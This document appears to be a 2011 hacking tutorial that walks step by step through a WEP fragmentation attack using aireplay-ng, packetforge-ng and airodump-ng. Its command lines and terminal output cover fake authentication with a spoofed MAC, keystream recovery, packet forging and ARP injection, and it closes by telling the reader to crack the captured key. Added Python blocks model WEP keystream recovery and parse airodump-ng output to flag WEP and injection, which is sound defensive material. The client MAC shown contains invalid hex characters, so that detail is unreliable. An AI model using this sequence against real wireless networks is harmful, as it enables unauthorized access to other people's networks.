fragmentation attack with aireplay-ng

Basically, the program obtains a small amount of keystream (keying material) from a captured data packet,
then attempts to send ARP and/or LLC packets with known content to the access point.
If a packet is successfully echoed back by the access point, a larger amount of keystream
can be obtained from the returned packet, because its plaintext is known: XORing the known plaintext with the ciphertext gives the keystream bytes for that IV.
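The following is an added example, not code from the aircrack-ng project or from this write-up: a minimal Python model of WEP (RC4 keyed with IV || key, CRC-32 ICV) that shows the weakness the paragraph describes. Every ARP frame starts with the same LLC/SNAP header, so XORing a captured ciphertext with that known header recovers keystream for the frame's IV; the recovered bytes then decrypt the start of any other frame sent under the same IV, and a longer packet with known content yields correspondingly more keystream. Key, IVs and payloads are constructed values.

```python
import zlib

# LLC/SNAP header that every ARP frame carries: known plaintext for free.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, body: bytes) -> bytes:
    """WEP frame body: IV (3 bytes) || key-id byte || RC4_{IV||key}(body || CRC-32 ICV)."""
    data = body + zlib.crc32(body).to_bytes(4, "little")
    return iv + b"\x00" + xor(data, rc4(iv + key, len(data)))


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Known plaintext XOR ciphertext = keystream bytes for this frame's IV."""
    iv, ciphertext = frame[:3], frame[4:]
    return iv, xor(ciphertext[: len(known_plaintext)], known_plaintext)


def decrypt_prefix(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt as many bytes of another frame as the recovered keystream covers."""
    return xor(frame[4 : 4 + len(keystream)], keystream)


def demo() -> dict:
    key = bytes.fromhex("0102030405")   # constructed 40-bit WEP key
    iv = bytes.fromhex("123456")        # constructed IV; WEP lets senders reuse IVs
    captured = wep_encrypt(key, iv, LLC_SNAP_ARP + bytes(20))  # constructed ARP frame
    _, ks = recover_keystream(captured, LLC_SNAP_ARP)          # 8 keystream bytes

    # A different frame under the same IV is readable for those 8 bytes.
    other = wep_encrypt(key, iv, LLC_SNAP_ARP + b"second frame payload")

    # A relayed packet whose whole content is known leaks keystream for its full length
    # (the echo is modelled here as a fresh frame under another constructed IV).
    echo = wep_encrypt(key, bytes.fromhex("abcdef"), bytes(1500))
    _, ks_long = recover_keystream(echo, bytes(1500))

    return {
        "keystream_bytes": len(ks),
        "matches_real_keystream": ks == rc4(iv + key, 8),
        "other_frame_prefix": decrypt_prefix(other, ks),
        "keystream_from_echo": len(ks_long),
    }


if __name__ == "__main__":
    print(demo())
```

The point for a defender is that none of this needs the key: a single frame with a predictable header is enough to start, which is why WEP cannot be patched and the only mitigation is WPA2/WPA3 with per-packet keys.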


scenario

ESSID : wireless
BSSID : 00:02:6F:23:2B:67
CLIENT MAC : 00:02:4G:87:22:FG


[o] you need to authenticate with the access point first (fake authentication, -1).

root@evilc0de:/home/noge# aireplay-ng -1 6000 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:58:55 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10

09:58:55 Sending Authentication Request (Open System)
09:58:55 Authentication successful
09:58:55 Sending Association Request
09:58:55 Association successful :-) (AID: 1)

09:59:10 Sending keep-alive packet
09:59:25 Sending keep-alive packet
09:59:40 Sending keep-alive packet


[o] run standard ARP request replay

root@evilc0de:/home/noge# aireplay-ng -3 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
08:07:58 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
Saving ARP requests in replay_arp-0706-080758.cap
You should also start airodump-ng to capture replies.
728 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

as you can see, I got 0 ARP requests, so the standard replay has nothing to work with: no client is generating ARP traffic to capture.


[o] fragmentation attack!

root@evilc0de:/home/noge# aireplay-ng -5 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:59:00 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:59:00 Waiting for a data packet...
Read 432 packets...

Size: 112, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0842 2c00 0002 6f87 11fe 0002 6f55 2bd2 .B,...o.....oU+.
0x0010: 000c 4252 2553 e05c 1398 2200 e7b4 f9fa ..BR%S.\..".....
0x0020: a786 d686 bfd1 8151 5bcf a8cb eac8 a10a .......Q[.......
0x0030: 52a9 49c5 ade4 de32 ef4b 294e c961 7de0 R.I....2.K)N.a}.
0x0040: 95ce afe7 ae32 225e 3af0 73db e7aa 47e4 .....2"^:.s...G.
0x0050: 6053 9a4c 0b8d 985b d9fe c1c3 dfc4 b82e `S.L...[........
0x0060: 82b4 a7f0 31bf 8fc6 dd01 4e77 1c02 0520 ....1.....Nw...

Use this packet ? y

Saving chosen packet in replay_src-0706-095931.cap
09:59:34 Data packet found!
09:59:34 Sending fragmented packet
09:59:34 Got RELAYED packet!!
09:59:34 Trying to get 384 bytes of a keystream
09:59:35 No answer, repeating...
09:59:35 Trying to get 384 bytes of a keystream
09:59:35 Trying a LLC NULL packet
09:59:37 No answer, repeating...
09:59:37 Trying to get 384 bytes of a keystream
09:59:39 No answer, repeating...
09:59:39 Trying to get 384 bytes of a keystream
09:59:39 Trying a LLC NULL packet
09:59:39 Got RELAYED packet!!
09:59:39 Trying to get 1500 bytes of a keystream
09:59:39 Got RELAYED packet!!
Saving keystream in fragment-0706-095939.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


[o] build your packet with packetforge-ng (-0 builds an ARP request, -y takes the keystream file, -w writes the forged packet)

root@evilc0de:/home/noge# packetforge-ng -0 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG -k 255.255.255.255 -l 255.255.255.255 -y fragment-0706-095939.xor -w privx
Wrote packet to: privx

[o] inject privx (interactive replay, -2) so that ARP requests can be captured

root@evilc0de:/home/noge# aireplay-ng -2 -x 150 -r privx -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG


Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0841 0201 0002 6f55 2bd2 0002 6f87 11fe .A....oU+...o...
0x0010: ffff ffff ffff 8001 3e98 2200 3a8c be0b ........>.".:...
0x0020: 0926 44f8 fe6a c35c d517 3ff1 2a8b 95df .&D..j.\..?.*...
0x0030: 97eb b45d bab9 b71b e777 edc7 8678 f1e7 ...].....w...x..
0x0040: d1b2 68b7 ..h.

Use this packet ? y

Saving chosen packet in replay_src-0706-100037.cap
You should also start airodump-ng to capture replies.

Sent 37888 packets...(150 pps)


[o] the ARP request replay now starts showing results [check the standard ARP request replay window]

422382 packets (got 103517 ARP requests and 239278 ACKs), sent 125781 packets...(478 pps)


[o] run airodump-ng to capture replies

root@evilc0de:/home/noge# airodump-ng -c 10 --bssid 00:02:6F:23:2B:67 -w wep mon0
CH 10 ][ Elapsed: 20 mins ][ 2011-07-06 10:19

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:02:6F:23:2B:67 -75 90 11337 100296 89 10 54 . WEP WEP OPN wireless

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:23:2B:67 00:02:4G:87:22:FG 0 36 - 1 1271 216477
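From the defender's side, the airodump-ng screen above already contains the two things worth alerting on: a network still running WEP, and a single station pushing a data rate that is consistent with replay injection rather than normal use. The following is an added example, not part of this write-up or of aircrack-ng: it parses rows in the screen layout shown above (the WEP row is the one from this page, the WPA2 row and the threshold of 50 data frames per second are constructed assumptions) and returns findings.

```python
import re

# Row layouts copied from the airodump-ng screen shown above. The MB column can
# render as "54", "54e" or "54 .", so it is matched tolerantly.
AP_ROW = re.compile(
    r"^(?P<bssid>\S+)\s+(?P<pwr>-?\d+)\s+(?P<rxq>\d+)\s+(?P<beacons>\d+)\s+"
    r"(?P<data>\d+)\s+(?P<per_s>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\d+e?\.?(?:\s+\.)?)\s+"
    r"(?P<enc>\S+)\s+(?P<cipher>\S+)\s+(?P<auth>\S+)\s+(?P<essid>.+?)\s*$"
)
STA_ROW = re.compile(
    r"^(?P<bssid>\S+)\s+(?P<station>\S+)\s+(?P<pwr>-?\d+)\s+"
    r"(?P<rx>\d+)e?\s*-\s*(?P<tx>\d+)e?\s+(?P<lost>\d+)\s+(?P<packets>\d+)"
    r"(?:\s+(?P<probes>.*))?$"
)

# Constructed sample: first AP row and the station row are the ones on this page,
# the second AP row is invented for contrast.
SAMPLE_AP = [
    "00:02:6F:23:2B:67 -75 90 11337 100296 89 10 54 . WEP WEP OPN wireless",
    "AA:BB:CC:DD:EE:01 -60 100 1200 340 2 6 54e WPA2 CCMP PSK homenet",
]
SAMPLE_STA = [
    "00:02:6F:23:2B:67 00:02:4G:87:22:FG 0 36 - 1 1271 216477",
]


def parse_ap(line: str):
    """Parse one AP row into a dict with numeric fields converted; None if no match."""
    m = AP_ROW.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    for k in ("pwr", "rxq", "beacons", "data", "per_s", "ch"):
        d[k] = int(d[k])
    return d


def parse_station(line: str):
    """Parse one station row; None if the line is not a station row."""
    m = STA_ROW.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    for k in ("pwr", "rx", "tx", "lost", "packets"):
        d[k] = int(d[k])
    return d


def assess(ap_lines, station_lines, inject_per_s: int = 50) -> list:
    """Return findings: WEP in use, and WEP networks with a replay-like data rate."""
    aps = [a for a in map(parse_ap, ap_lines) if a]
    stations = [s for s in map(parse_station, station_lines) if s]
    findings = []
    for ap in aps:
        if ap["enc"] != "WEP":
            continue
        findings.append({
            "bssid": ap["bssid"], "essid": ap["essid"], "issue": "wep",
            "detail": "WEP: keystream recoverable from a single data frame; migrate to WPA2/WPA3",
        })
        if ap["per_s"] >= inject_per_s:  # assumed threshold, tune per site
            stas = [s["station"] for s in stations if s["bssid"] == ap["bssid"]]
            findings.append({
                "bssid": ap["bssid"], "essid": ap["essid"], "issue": "injection_suspected",
                "detail": f"{ap['per_s']} data frames/s, {ap['data']} total; "
                          f"check whether one station generates it",
                "stations": stas,
            })
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_AP, SAMPLE_STA):
        print(f)
```

On the page's own numbers the WEP network shows 89 data frames per second and one station with 216477 packets in 20 minutes, which is the pattern an ARP replay produces; a wireless IDS would raise the same two alerts, and the lasting fix is retiring WEP rather than tuning the threshold.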


[o] crack your .cap file to find the key!